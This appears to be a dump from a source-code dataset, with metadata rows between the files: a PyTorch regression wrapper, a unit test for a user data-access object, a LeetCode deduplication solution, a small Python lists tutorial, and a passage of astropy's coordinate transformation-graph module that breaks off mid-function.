loss = loss_func(y_pred, y)
optimizer.zero_grad()
loss.backward()
optimizer.step()
y_pred_comp = model(X).detach().cpu().numpy().reshape(-1,)
score = score_func(y_pred_comp, y_comp)
bar.set_description(f"Score: {round(score, 5)}")
return model
class ModelWrapper(object):
def __init__(self, model = LinearNet, train_func = train, feature_pipeline = sk_pipeline, **kwargs):
self.model = model(**kwargs)
self.train_func = train_func
self.feature_pipeline = feature_pipeline
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def fit(self, X, y, **kwargs):
X = self.feature_pipeline.fit_transform(X, y)
y = y.reshape(-1, 1)
X = X.reshape(-1, X.shape[1], 1)
X = torch.Tensor(X)
y = torch.Tensor(y)
X = X.to(self.device)
y = y.to(self.device)
self.model = self.model.to(self.device)
self.model = self.train_func(self.model, X, y, **kwargs)
def detach(self, y):
return y.detach().cpu().numpy().reshape(-1,)
def predict(self, X):
X = self.feature_pipeline.transform(X)
X = X.reshape(-1, X.shape[1], 1)
X = torch.Tensor(X)
X = X.to(self.device)
y = self.model(X)
return self.detach(y)
def save(self, dir):
with open(dir, 'wb') as f:
pickle.dump(self, f)
| 25.884298
| 104
| 0.590996
|
import os
import torch
from torch import nn
from torch import optim
import torch.nn.functional as F
from tqdm import tqdm
import numpy as np
from sklearn.preprocessing import (
StandardScaler,
MinMaxScaler,
)
from sklearn.pipeline import Pipeline
from gplearn.genetic import SymbolicTransformer
import pickle
sk_pipeline = Pipeline(
[
('scaler', StandardScaler()),
]
)
def correlation(x, y):
return np.corrcoef(x, y)[0, 1]
class LinearNet(nn.Module):
def __init__(self, n_feat, n_out= 1):
super().__init__()
self.conv1 = nn.Conv1d(n_feat, 15, 1)
self.pool1 = nn.MaxPool1d(1)
self.flatten = nn.Flatten()
self.relu1 = nn.ReLU()
self.linear1 = nn.Linear(15, 5)
self.out = nn.Linear(5, n_out)
def forward(self, x):
x = self.conv1(x)
x = self.pool1(x)
x = self.flatten(x)
x = self.relu1(x)
x = self.linear1(x)
x = self.out(x)
return x
def train(
model,
X, y,
epochs=50000,
batch_size=None,
learning_rate=1e-5,
score_func=correlation,
optimizer=optim.Adam,
loss_func=nn.MSELoss(),
):
y_comp = y.detach().cpu().numpy().reshape(-1,)
optimizer = optimizer(model.parameters(), lr=learning_rate)
splits = floor(len(X) / batch_size) if batch_size != None else 1
X_batches = torch.tensor_split(X, splits)
y_batches = torch.tensor_split(y, splits)
bar = tqdm(range(epochs))
for epoch in bar:
for x, y in zip(X_batches, y_batches):
y_pred = model(x)
loss = loss_func(y_pred, y)
optimizer.zero_grad()
loss.backward()
optimizer.step()
y_pred_comp = model(X).detach().cpu().numpy().reshape(-1,)
score = score_func(y_pred_comp, y_comp)
bar.set_description(f"Score: {round(score, 5)}")
return model
class ModelWrapper(object):
def __init__(self, model = LinearNet, train_func = train, feature_pipeline = sk_pipeline, **kwargs):
self.model = model(**kwargs)
self.train_func = train_func
self.feature_pipeline = feature_pipeline
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def fit(self, X, y, **kwargs):
X = self.feature_pipeline.fit_transform(X, y)
y = y.reshape(-1, 1)
X = X.reshape(-1, X.shape[1], 1)
X = torch.Tensor(X)
y = torch.Tensor(y)
X = X.to(self.device)
y = y.to(self.device)
self.model = self.model.to(self.device)
self.model = self.train_func(self.model, X, y, **kwargs)
def detach(self, y):
return y.detach().cpu().numpy().reshape(-1,)
def predict(self, X):
X = self.feature_pipeline.transform(X)
X = X.reshape(-1, X.shape[1], 1)
X = torch.Tensor(X)
X = X.to(self.device)
y = self.model(X)
return self.detach(y)
def save(self, dir):
with open(dir, 'wb') as f:
pickle.dump(self, f)
| true
| true
|
1c446c1a6bc3489b11c669948577e7a3ca162f01
| 222
|
py
|
Python
|
crispy_shifty/__init__.py
|
proleu/crispy_shifty
|
87393581a67cbeda287f858a8860145b6ccb5768
|
[
"MIT"
] | 4
|
2022-01-11T23:40:12.000Z
|
2022-03-03T00:42:57.000Z
|
crispy_shifty/__init__.py
|
proleu/crispy_shifty
|
87393581a67cbeda287f858a8860145b6ccb5768
|
[
"MIT"
] | null | null | null |
crispy_shifty/__init__.py
|
proleu/crispy_shifty
|
87393581a67cbeda287f858a8860145b6ccb5768
|
[
"MIT"
] | null | null | null |
# TODO smart sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) type thing?
# import sys
# from pathlib import Path
#
# # As PosixPath
# sys.path.append(Path(__file__).parent ) #.parent.parent) might be better
| 31.714286
| 87
| 0.734234
| true
| true
|
|
1c446c2f5aac664a71d64849454ca09648c92f8f
| 776
|
py
|
Python
|
test/dao/test_userInfoDao.py
|
clarkchen/tiflask
|
7dee6d2de85b9b15eb233d2e4dfcda218ab4c65b
|
[
"Apache-2.0"
] | null | null | null |
test/dao/test_userInfoDao.py
|
clarkchen/tiflask
|
7dee6d2de85b9b15eb233d2e4dfcda218ab4c65b
|
[
"Apache-2.0"
] | null | null | null |
test/dao/test_userInfoDao.py
|
clarkchen/tiflask
|
7dee6d2de85b9b15eb233d2e4dfcda218ab4c65b
|
[
"Apache-2.0"
] | null | null | null |
from unittest import TestCase
from tiflask.dao import UserInfoDao
class TestUserInfoDao(TestCase):
def test_get_user_article_relation(self):
dao = UserInfoDao()
phone = "18500195632"
user_info = dao.get_user_base_info(phone)
# print (user_info.phone)
self.assertIsNotNone(user_info.phone)
user_id = user_info.id
relation_info_list = dao.get_user_article_relation(user_id)
for x in relation_info_list:
print(x.article_id)
self.assertIsNotNone(x.article_id)
def test_get_user_base_info(self):
dao = UserInfoDao()
phone = "18500195632"
user_info = dao.get_user_base_info(phone)
print(user_info.phone)
self.assertIsNotNone(user_info.phone)
| 31.04
| 67
| 0.679124
|
from unittest import TestCase
from tiflask.dao import UserInfoDao
class TestUserInfoDao(TestCase):
def test_get_user_article_relation(self):
dao = UserInfoDao()
phone = "18500195632"
user_info = dao.get_user_base_info(phone)
self.assertIsNotNone(user_info.phone)
user_id = user_info.id
relation_info_list = dao.get_user_article_relation(user_id)
for x in relation_info_list:
print(x.article_id)
self.assertIsNotNone(x.article_id)
def test_get_user_base_info(self):
dao = UserInfoDao()
phone = "18500195632"
user_info = dao.get_user_base_info(phone)
print(user_info.phone)
self.assertIsNotNone(user_info.phone)
| true
| true
|
1c446ceb8906235f5651b60a7e78a640259e6170
| 300
|
py
|
Python
|
problems/remove-duplicates-from-sorted-array/solution-1.py
|
MleMoe/LeetCode-1
|
14f275ba3c8079b820808da17c4952fcf9c8253c
|
[
"MIT"
] | 2
|
2021-03-25T01:58:55.000Z
|
2021-08-06T12:47:13.000Z
|
problems/remove-duplicates-from-sorted-array/solution-1.py
|
MleMoe/LeetCode-1
|
14f275ba3c8079b820808da17c4952fcf9c8253c
|
[
"MIT"
] | 3
|
2019-08-27T13:25:42.000Z
|
2021-08-28T17:49:34.000Z
|
problems/remove-duplicates-from-sorted-array/solution-1.py
|
MleMoe/LeetCode-1
|
14f275ba3c8079b820808da17c4952fcf9c8253c
|
[
"MIT"
] | 1
|
2021-08-14T08:49:39.000Z
|
2021-08-14T08:49:39.000Z
|
class Solution:
def removeDuplicates(self, nums: [int]) -> int:
if len(nums) == 0:
return 0
order = 0
for i in range(1, len(nums)):
if nums[order] != nums[i]:
order += 1
nums[order] = nums[i]
return order + 1
| 30
| 51
| 0.453333
|
class Solution:
def removeDuplicates(self, nums: [int]) -> int:
if len(nums) == 0:
return 0
order = 0
for i in range(1, len(nums)):
if nums[order] != nums[i]:
order += 1
nums[order] = nums[i]
return order + 1
| true
| true
|
1c446cffc3bb328dbe5a01254b5550c010eec188
| 686
|
py
|
Python
|
lists.py
|
emersonnobre/python-basics
|
e4e4f17b83661e210e5379005d85364b09587593
|
[
"MIT"
] | null | null | null |
lists.py
|
emersonnobre/python-basics
|
e4e4f17b83661e210e5379005d85364b09587593
|
[
"MIT"
] | null | null | null |
lists.py
|
emersonnobre/python-basics
|
e4e4f17b83661e210e5379005d85364b09587593
|
[
"MIT"
] | null | null | null |
friends = ["Murilo", "Duda", "Rebecca"]
polymorfism = [1, False, "some text"]
numbers = [1, 34, 2, 1, 0, 34, 4, 100, 98]
#Funções para listas
friends.extend(polymorfism) # adiciona um array no final do array
friends.append("Carlinhos") # adiciona um valor na última posição do array
friends.insert(1, "Doja") # adiciona um valor do index especificado e desloca os demais itens para frente
friends.remove("Carlinhos") # remove o elemento com o valor especificado, se não encontrar estoura erro
friends.pop() # remove o último valor do array
friends.extend( [1, 1] )
numbers.sort()
print(friends.count(1)) # conta o número de ocorrências do valor passado
print(friends)
print(numbers)
| 40.352941
| 106
| 0.739067
|
friends = ["Murilo", "Duda", "Rebecca"]
polymorfism = [1, False, "some text"]
numbers = [1, 34, 2, 1, 0, 34, 4, 100, 98]
friends.extend(polymorfism)
friends.append("Carlinhos")
friends.insert(1, "Doja")
friends.remove("Carlinhos")
friends.pop()
friends.extend( [1, 1] )
numbers.sort()
print(friends.count(1))
print(friends)
print(numbers)
| true
| true
|
1c446d71885ae3d23a95f291c3dfb10fe99cb957
| 53,754
|
py
|
Python
|
astropy/coordinates/transformations.py
|
REMeyer/astropy
|
28c49fb618538a01812e586cd07bccdf0591a6c6
|
[
"BSD-3-Clause"
] | null | null | null |
astropy/coordinates/transformations.py
|
REMeyer/astropy
|
28c49fb618538a01812e586cd07bccdf0591a6c6
|
[
"BSD-3-Clause"
] | null | null | null |
astropy/coordinates/transformations.py
|
REMeyer/astropy
|
28c49fb618538a01812e586cd07bccdf0591a6c6
|
[
"BSD-3-Clause"
] | null | null | null |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This module contains a general framework for defining graphs of transformations
between coordinates, suitable for either spatial coordinates or more generalized
coordinate systems.
The fundamental idea is that each class is a node in the transformation graph,
and transitions from one node to another are defined as functions (or methods)
wrapped in transformation objects.
This module also includes more specific transformation classes for
celestial/spatial coordinate frames, generally focused around matrix-style
transformations that are typically how the algorithms are defined.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import heapq
import inspect
import subprocess
from warnings import warn
from abc import ABCMeta, abstractmethod
from collections import defaultdict, OrderedDict
import numpy as np
from .. import units as u
from ..utils.compat import suppress
from ..utils.compat.funcsigs import signature
from ..utils.exceptions import AstropyWarning
from ..extern import six
from ..extern.six.moves import range
from .representation import REPRESENTATION_CLASSES
__all__ = ['TransformGraph', 'CoordinateTransform', 'FunctionTransform',
'BaseAffineTransform', 'AffineTransform',
'StaticMatrixTransform', 'DynamicMatrixTransform',
'FunctionTransformWithFiniteDifference', 'CompositeTransform']
class TransformGraph(object):
"""
A graph representing the paths between coordinate frames.
"""
def __init__(self):
self._graph = defaultdict(dict)
self.invalidate_cache() # generates cache entries
@property
def _cached_names(self):
if self._cached_names_dct is None:
self._cached_names_dct = dct = {}
for c in self.frame_set:
nm = getattr(c, 'name', None)
if nm is not None:
dct[nm] = c
return self._cached_names_dct
@property
def frame_set(self):
"""
A `set` of all the frame classes present in this `TransformGraph`.
"""
if self._cached_frame_set is None:
self._cached_frame_set = frm_set = set()
for a in self._graph:
frm_set.add(a)
for b in self._graph[a]:
frm_set.add(b)
return self._cached_frame_set.copy()
@property
def frame_attributes(self):
"""
A `dict` of all the attributes of all frame classes in this `TransformGraph`.
"""
if self._cached_frame_attributes is None:
result = {}
for frame_cls in self.frame_set:
result.update(frame_cls.frame_attributes)
self._cached_frame_attributes = result
return self._cached_frame_attributes
def invalidate_cache(self):
"""
Invalidates the cache that stores optimizations for traversing the
transform graph. This is called automatically when transforms
are added or removed, but will need to be called manually if
weights on transforms are modified inplace.
"""
self._cached_names_dct = None
self._cached_frame_set = None
self._cached_frame_attributes = None
self._shortestpaths = {}
self._composite_cache = {}
def add_transform(self, fromsys, tosys, transform):
"""
Add a new coordinate transformation to the graph.
Parameters
----------
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
transform : CoordinateTransform or similar callable
The transformation object. Typically a `CoordinateTransform` object,
although it may be some other callable that is called with the same
signature.
Raises
------
TypeError
If ``fromsys`` or ``tosys`` are not classes or ``transform`` is
not callable.
"""
if not inspect.isclass(fromsys):
raise TypeError('fromsys must be a class')
if not inspect.isclass(tosys):
raise TypeError('tosys must be a class')
if not six.callable(transform):
raise TypeError('transform must be callable')
self._graph[fromsys][tosys] = transform
self.invalidate_cache()
def remove_transform(self, fromsys, tosys, transform):
"""
Removes a coordinate transform from the graph.
Parameters
----------
fromsys : class or `None`
The coordinate frame *class* to start from. If `None`,
``transform`` will be searched for and removed (``tosys`` must
also be `None`).
tosys : class or `None`
The coordinate frame *class* to transform into. If `None`,
``transform`` will be searched for and removed (``fromsys`` must
also be `None`).
transform : callable or `None`
The transformation object to be removed or `None`. If `None`
and ``tosys`` and ``fromsys`` are supplied, there will be no
check to ensure the correct object is removed.
"""
if fromsys is None or tosys is None:
if not (tosys is None and fromsys is None):
raise ValueError('fromsys and tosys must both be None if either are')
if transform is None:
raise ValueError('cannot give all Nones to remove_transform')
# search for the requested transform by brute force and remove it
for a in self._graph:
agraph = self._graph[a]
for b in agraph:
if b is transform:
del agraph[b]
break
else:
raise ValueError('Could not find transform {0} in the '
'graph'.format(transform))
else:
if transform is None:
self._graph[fromsys].pop(tosys, None)
else:
curr = self._graph[fromsys].get(tosys, None)
if curr is transform:
self._graph[fromsys].pop(tosys)
else:
raise ValueError('Current transform from {0} to {1} is not '
'{2}'.format(fromsys, tosys, transform))
self.invalidate_cache()
def find_shortest_path(self, fromsys, tosys):
"""
Computes the shortest distance along the transform graph from
one system to another.
Parameters
----------
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
Returns
-------
path : list of classes or `None`
The path from ``fromsys`` to ``tosys`` as an in-order sequence
of classes. This list includes *both* ``fromsys`` and
``tosys``. Is `None` if there is no possible path.
distance : number
The total distance/priority from ``fromsys`` to ``tosys``. If
priorities are not set this is the number of transforms
needed. Is ``inf`` if there is no possible path.
"""
inf = float('inf')
# special-case the 0 or 1-path
if tosys is fromsys:
if tosys not in self._graph[fromsys]:
# Means there's no transform necessary to go from it to itself.
return [tosys], 0
if tosys in self._graph[fromsys]:
# this will also catch the case where tosys is fromsys, but has
# a defined transform.
t = self._graph[fromsys][tosys]
return [fromsys, tosys], float(t.priority if hasattr(t, 'priority') else 1)
# otherwise, need to construct the path:
if fromsys in self._shortestpaths:
# already have a cached result
fpaths = self._shortestpaths[fromsys]
if tosys in fpaths:
return fpaths[tosys]
else:
return None, inf
# use Dijkstra's algorithm to find shortest path in all other cases
nodes = []
# first make the list of nodes
for a in self._graph:
if a not in nodes:
nodes.append(a)
for b in self._graph[a]:
if b not in nodes:
nodes.append(b)
if fromsys not in nodes or tosys not in nodes:
# fromsys or tosys are isolated or not registered, so there's
# certainly no way to get from one to the other
return None, inf
edgeweights = {}
# construct another graph that is a dict of dicts of priorities
# (used as edge weights in Dijkstra's algorithm)
for a in self._graph:
edgeweights[a] = aew = {}
agraph = self._graph[a]
for b in agraph:
aew[b] = float(agraph[b].priority if hasattr(agraph[b], 'priority') else 1)
# entries in q are [distance, count, nodeobj, pathlist]
# count is needed because in py 3.x, tie-breaking fails on the nodes.
# this way, insertion order is preserved if the weights are the same
q = [[inf, i, n, []] for i, n in enumerate(nodes) if n is not fromsys]
q.insert(0, [0, -1, fromsys, []])
# this dict will store the distance to node from ``fromsys`` and the path
result = {}
# definitely starts as a valid heap because of the insert line; from the
# node to itself is always the shortest distance
while len(q) > 0:
d, orderi, n, path = heapq.heappop(q)
if d == inf:
# everything left is unreachable from fromsys, just copy them to
# the results and jump out of the loop
result[n] = (None, d)
for d, orderi, n, path in q:
result[n] = (None, d)
break
else:
result[n] = (path, d)
path.append(n)
if n not in edgeweights:
# this is a system that can be transformed to, but not from.
continue
for n2 in edgeweights[n]:
if n2 not in result: # already visited
# find where n2 is in the heap
for i in range(len(q)):
if q[i][2] == n2:
break
else:
raise ValueError('n2 not in heap - this should be impossible!')
newd = d + edgeweights[n][n2]
if newd < q[i][0]:
q[i][0] = newd
q[i][3] = list(path)
heapq.heapify(q)
# cache for later use
self._shortestpaths[fromsys] = result
return result[tosys]
def get_transform(self, fromsys, tosys):
"""
Generates and returns the `CompositeTransform` for a transformation
between two coordinate systems.
Parameters
----------
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
Returns
-------
trans : `CompositeTransform` or `None`
If there is a path from ``fromsys`` to ``tosys``, this is a
transform object for that path. If no path could be found, this is
`None`.
Notes
-----
This function always returns a `CompositeTransform`, because
`CompositeTransform` is slightly more adaptable in the way it can be
called than other transform classes. Specifically, it takes care of
intermediate steps of transformations in a way that is consistent with
1-hop transformations.
"""
if not inspect.isclass(fromsys):
raise TypeError('fromsys is not a class')
if not inspect.isclass(tosys):
raise TypeError('tosys is not a class')
path, distance = self.find_shortest_path(fromsys, tosys)
if path is None:
return None
transforms = []
currsys = fromsys
for p in path[1:]: # first element is fromsys so we skip it
transforms.append(self._graph[currsys][p])
currsys = p
fttuple = (fromsys, tosys)
if fttuple not in self._composite_cache:
comptrans = CompositeTransform(transforms, fromsys, tosys,
register_graph=False)
self._composite_cache[fttuple] = comptrans
return self._composite_cache[fttuple]
def lookup_name(self, name):
"""
Tries to locate the coordinate class with the provided alias.
Parameters
----------
name : str
The alias to look up.
Returns
-------
coordcls
The coordinate class corresponding to the ``name`` or `None` if
no such class exists.
"""
return self._cached_names.get(name, None)
def get_names(self):
"""
Returns all available transform names. They will all be
valid arguments to `lookup_name`.
Returns
-------
nms : list
The aliases for coordinate systems.
"""
return list(six.iterkeys(self._cached_names))
def to_dot_graph(self, priorities=True, addnodes=[], savefn=None,
savelayout='plain', saveformat=None, color_edges=True):
"""
Converts this transform graph to the graphviz_ DOT format.
Optionally saves it (requires `graphviz`_ be installed and on your path).
.. _graphviz: http://www.graphviz.org/
Parameters
----------
priorities : bool
If `True`, show the priority values for each transform. Otherwise,
the will not be included in the graph.
addnodes : sequence of str
Additional coordinate systems to add (this can include systems
already in the transform graph, but they will only appear once).
savefn : `None` or str
The file name to save this graph to or `None` to not save
to a file.
savelayout : str
The graphviz program to use to layout the graph (see
graphviz_ for details) or 'plain' to just save the DOT graph
content. Ignored if ``savefn`` is `None`.
saveformat : str
The graphviz output format. (e.g. the ``-Txxx`` option for
the command line program - see graphviz docs for details).
Ignored if ``savefn`` is `None`.
color_edges : bool
Color the edges between two nodes (frames) based on the type of
transform. ``FunctionTransform``: red, ``StaticMatrixTransform``:
blue, ``DynamicMatrixTransform``: green.
Returns
-------
dotgraph : str
A string with the DOT format graph.
"""
nodes = []
# find the node names
for a in self._graph:
if a not in nodes:
nodes.append(a)
for b in self._graph[a]:
if b not in nodes:
nodes.append(b)
for node in addnodes:
if node not in nodes:
nodes.append(node)
nodenames = []
invclsaliases = dict([(v, k) for k, v in six.iteritems(self._cached_names)])
for n in nodes:
if n in invclsaliases:
nodenames.append('{0} [shape=oval label="{0}\\n`{1}`"]'.format(n.__name__, invclsaliases[n]))
else:
nodenames.append(n.__name__ + '[ shape=oval ]')
edgenames = []
# Now the edges
for a in self._graph:
agraph = self._graph[a]
for b in agraph:
transform = agraph[b]
pri = transform.priority if hasattr(transform, 'priority') else 1
color = trans_to_color[transform.__class__] if color_edges else 'black'
edgenames.append((a.__name__, b.__name__, pri, color))
# generate simple dot format graph
lines = ['digraph AstropyCoordinateTransformGraph {']
lines.append('; '.join(nodenames) + ';')
for enm1, enm2, weights, color in edgenames:
labelstr_fmt = '[ {0} {1} ]'
if priorities:
priority_part = 'label = "{0}"'.format(weights)
else:
priority_part = ''
color_part = 'color = "{0}"'.format(color)
labelstr = labelstr_fmt.format(priority_part, color_part)
lines.append('{0} -> {1}{2};'.format(enm1, enm2, labelstr))
lines.append('')
lines.append('overlap=false')
lines.append('}')
dotgraph = '\n'.join(lines)
if savefn is not None:
if savelayout == 'plain':
with open(savefn, 'w') as f:
f.write(dotgraph)
else:
args = [savelayout]
if saveformat is not None:
args.append('-T' + saveformat)
proc = subprocess.Popen(args, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = proc.communicate(dotgraph)
if proc.returncode != 0:
raise IOError('problem running graphviz: \n' + stderr)
with open(savefn, 'w') as f:
f.write(stdout)
return dotgraph
def to_networkx_graph(self):
"""
Converts this transform graph into a networkx graph.
.. note::
You must have the `networkx <http://networkx.lanl.gov/>`_
package installed for this to work.
Returns
-------
nxgraph : `networkx.Graph <http://networkx.lanl.gov/reference/classes.graph.html>`_
This `TransformGraph` as a `networkx.Graph`_.
"""
import networkx as nx
nxgraph = nx.Graph()
# first make the nodes
for a in self._graph:
if a not in nxgraph:
nxgraph.add_node(a)
for b in self._graph[a]:
if b not in nxgraph:
nxgraph.add_node(b)
# Now the edges
for a in self._graph:
agraph = self._graph[a]
for b in agraph:
transform = agraph[b]
pri = transform.priority if hasattr(transform, 'priority') else 1
color = trans_to_color[transform.__class__]
nxgraph.add_edge(a, b, weight=pri, color=color)
return nxgraph
def transform(self, transcls, fromsys, tosys, priority=1, **kwargs):
"""
A function decorator for defining transformations.
.. note::
If decorating a static method of a class, ``@staticmethod``
should be added *above* this decorator.
Parameters
----------
transcls : class
The class of the transformation object to create.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority if this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
Additional keyword arguments are passed into the ``transcls``
constructor.
Returns
-------
deco : function
A function that can be called on another function as a decorator
(see example).
Notes
-----
This decorator assumes the first argument of the ``transcls``
initializer accepts a callable, and that the second and third
are ``fromsys`` and ``tosys``. If this is not true, you should just
initialize the class manually and use `add_transform` instead of
using this decorator.
Examples
--------
::
graph = TransformGraph()
class Frame1(BaseCoordinateFrame):
...
class Frame2(BaseCoordinateFrame):
...
@graph.transform(FunctionTransform, Frame1, Frame2)
def f1_to_f2(f1_obj):
... do something with f1_obj ...
return f2_obj
"""
def deco(func):
# this doesn't do anything directly with the transform because
# ``register_graph=self`` stores it in the transform graph
# automatically
transcls(func, fromsys, tosys, priority=priority,
register_graph=self, **kwargs)
return func
return deco
# <-------------------Define the builtin transform classes-------------------->
@six.add_metaclass(ABCMeta)
class CoordinateTransform(object):
"""
An object that transforms a coordinate from one system to another.
Subclasses must implement `__call__` with the provided signature.
They should also call this superclass's ``__init__`` in their
``__init__``.
Parameters
----------
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority if this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
"""
def __init__(self, fromsys, tosys, priority=1, register_graph=None):
if not inspect.isclass(fromsys):
raise TypeError('fromsys must be a class')
if not inspect.isclass(tosys):
raise TypeError('tosys must be a class')
self.fromsys = fromsys
self.tosys = tosys
self.priority = float(priority)
if register_graph:
# this will do the type-checking when it adds to the graph
self.register(register_graph)
else:
if not inspect.isclass(fromsys) or not inspect.isclass(tosys):
raise TypeError('fromsys and tosys must be classes')
self.overlapping_frame_attr_names = overlap = []
if (hasattr(fromsys, 'get_frame_attr_names') and
hasattr(tosys, 'get_frame_attr_names')):
# the if statement is there so that non-frame things might be usable
# if it makes sense
for from_nm in fromsys.get_frame_attr_names():
if from_nm in tosys.get_frame_attr_names():
overlap.append(from_nm)
def register(self, graph):
"""
Add this transformation to the requested Transformation graph,
replacing anything already connecting these two coordinates.
Parameters
----------
graph : a TransformGraph object
The graph to register this transformation with.
"""
graph.add_transform(self.fromsys, self.tosys, self)
def unregister(self, graph):
"""
Remove this transformation from the requested transformation
graph.
Parameters
----------
graph : a TransformGraph object
The graph to unregister this transformation from.
Raises
------
ValueError
If this is not currently in the transform graph.
"""
graph.remove_transform(self.fromsys, self.tosys, self)
@abstractmethod
def __call__(self, fromcoord, toframe):
"""
Does the actual coordinate transformation from the ``fromsys`` class to
the ``tosys`` class.
Parameters
----------
fromcoord : fromsys object
An object of class matching ``fromsys`` that is to be transformed.
toframe : object
An object that has the attributes necessary to fully specify the
frame. That is, it must have attributes with names that match the
keys of the dictionary that ``tosys.get_frame_attr_names()``
returns. Typically this is of class ``tosys``, but it *might* be
some other class as long as it has the appropriate attributes.
Returns
-------
tocoord : tosys object
The new coordinate after the transform has been applied.
"""
class FunctionTransform(CoordinateTransform):
"""
A coordinate transformation defined by a function that accepts a
coordinate object and returns the transformed coordinate object.
Parameters
----------
func : callable
The transformation function. Should have a call signature
``func(formcoord, toframe)``. Note that, unlike
`CoordinateTransform.__call__`, ``toframe`` is assumed to be of type
``tosys`` for this function.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority if this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
Raises
------
TypeError
If ``func`` is not callable.
ValueError
If ``func`` cannot accept two arguments.
"""
def __init__(self, func, fromsys, tosys, priority=1, register_graph=None):
if not six.callable(func):
raise TypeError('func must be callable')
with suppress(TypeError):
sig = signature(func)
kinds = [x.kind for x in sig.parameters.values()]
if (len(x for x in kinds if x == sig.POSITIONAL_ONLY) != 2
and sig.VAR_POSITIONAL not in kinds):
raise ValueError('provided function does not accept two arguments')
self.func = func
super(FunctionTransform, self).__init__(fromsys, tosys,
priority=priority, register_graph=register_graph)
def __call__(self, fromcoord, toframe):
res = self.func(fromcoord, toframe)
if not isinstance(res, self.tosys):
raise TypeError('the transformation function yielded {0} but '
'should have been of type {1}'.format(res, self.tosys))
if fromcoord.data.differentials and not res.data.differentials:
warn("Applied a FunctionTransform to a coordinate frame with "
"differentials, but the FunctionTransform does not handle "
"differentials, so they have been dropped.", AstropyWarning)
return res
class FunctionTransformWithFiniteDifference(FunctionTransform):
r"""
A coordinate transformation that works like a `FunctionTransform`, but
computes velocity shifts based on the finite-difference relative to one of
the frame attributes. Note that the transform function should *not* change
the differential at all in this case, as any differentials will be
overridden.
When a differential is in the from coordinate, the finite difference
calculation has two components. The first part is simple the existing
differential, but re-orientation (using finite-difference techniques) to
point in the direction the velocity vector has in the *new* frame. The
second component is the "induced" velocity. That is, the velocity
intrinsic to the frame itself, estimated by shifting the frame using the
``finite_difference_frameattr_name`` frame attribute a small amount
(``finite_difference_dt``) in time and re-calculating the position.
Parameters
----------
finite_difference_frameattr_name : str or None
The name of the frame attribute on the frames to use for the finite
difference. Both the to and the from frame will be checked for this
attribute, but only one needs to have it. If None, no velocity
component induced from the frame itself will be included - only the
re-orientation of any exsiting differential.
finite_difference_dt : `~astropy.units.Quantity` or callable
If a quantity, this is the size of the differential used to do the
finite difference. If a callable, should accept
``(fromcoord, toframe)`` and return the ``dt`` value.
symmetric_finite_difference : bool
If True, the finite difference is computed as
:math:`\frac{x(t + \Delta t / 2) - x(t + \Delta t / 2)}{\Delta t}`, or
if False, :math:`\frac{x(t + \Delta t) - x(t)}{\Delta t}`. The latter
case has slightly better performance (and more stable finite difference
behavior).
All other parameters are identical to the initializer for
`FunctionTransform`.
"""
def __init__(self, func, fromsys, tosys, priority=1, register_graph=None,
finite_difference_frameattr_name='obstime',
finite_difference_dt=1*u.second,
symmetric_finite_difference=True):
super(FunctionTransformWithFiniteDifference, self).__init__(func,
fromsys, tosys, priority, register_graph)
self.finite_difference_frameattr_name = finite_difference_frameattr_name
self.finite_difference_dt = finite_difference_dt
self.symmetric_finite_difference = symmetric_finite_difference
@property
def finite_difference_frameattr_name(self):
return self._finite_difference_frameattr_name
@finite_difference_frameattr_name.setter
def finite_difference_frameattr_name(self, value):
if value is None:
self._diff_attr_in_fromsys = self._diff_attr_in_tosys = False
else:
diff_attr_in_fromsys = value in self.fromsys.frame_attributes
diff_attr_in_tosys = value in self.tosys.frame_attributes
if diff_attr_in_fromsys or diff_attr_in_tosys:
self._diff_attr_in_fromsys = diff_attr_in_fromsys
self._diff_attr_in_tosys = diff_attr_in_tosys
else:
raise ValueError('Frame attribute name {} is not a frame '
'attribute of {} or {}'.format(value,
self.fromsys,
self.tosys))
self._finite_difference_frameattr_name = value
def __call__(self, fromcoord, toframe):
from .representation import (CartesianRepresentation,
CartesianDifferential)
supcall = self.func
if fromcoord.data.differentials:
# this is the finite difference case
if callable(self.finite_difference_dt):
dt = self.finite_difference_dt(fromcoord, toframe)
else:
dt = self.finite_difference_dt
halfdt = dt/2
from_diffless = fromcoord.realize_frame(fromcoord.data.without_differentials())
reprwithoutdiff = supcall(from_diffless, toframe)
# first we use the existing differential to compute an offset due to
# the already-existing velocity, but in the new frame
fromcoord_cart = fromcoord.cartesian
if self.symmetric_finite_difference:
fwdxyz = (fromcoord_cart.xyz +
fromcoord_cart.differentials['s'].d_xyz*halfdt)
fwd = supcall(fromcoord.realize_frame(CartesianRepresentation(fwdxyz)), toframe)
backxyz = (fromcoord_cart.xyz -
fromcoord_cart.differentials['s'].d_xyz*halfdt)
back = supcall(fromcoord.realize_frame(CartesianRepresentation(backxyz)), toframe)
else:
fwdxyz = (fromcoord_cart.xyz +
fromcoord_cart.differentials['s'].d_xyz*dt)
fwd = supcall(fromcoord.realize_frame(CartesianRepresentation(fwdxyz)), toframe)
back = reprwithoutdiff
diffxyz = (fwd.cartesian - back.cartesian).xyz / dt
# now we compute the "induced" velocities due to any movement in
# the frame itself over time
attrname = self.finite_difference_frameattr_name
if attrname is not None:
if self.symmetric_finite_difference:
if self._diff_attr_in_fromsys:
kws = {attrname: getattr(from_diffless, attrname) + halfdt}
from_diffless_fwd = from_diffless.replicate(**kws)
else:
from_diffless_fwd = from_diffless
if self._diff_attr_in_tosys:
kws = {attrname: getattr(toframe, attrname) + halfdt}
